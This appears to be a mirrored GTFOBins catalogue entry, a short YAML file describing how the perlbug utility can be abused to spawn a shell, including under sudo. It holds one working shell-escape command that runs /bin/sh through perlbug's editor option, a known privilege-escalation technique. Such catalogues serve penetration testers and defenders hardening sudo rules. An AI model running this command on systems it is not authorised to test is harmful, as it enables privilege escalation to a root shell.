mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-03-08 06:56:15 +01:00
12 lines
237 B
Plaintext
12 lines
237 B
Plaintext
---
|
|
functions:
|
|
shell:
|
|
- code: |-
|
|
perlbug -s 'x x x' -r x -c x -e 'exec /bin/sh #'
|
|
comment: |-
|
|
This requires to press `Enter` serveral times before the shell is spawn.
|
|
contexts:
|
|
sudo:
|
|
unprivileged:
|
|
...
|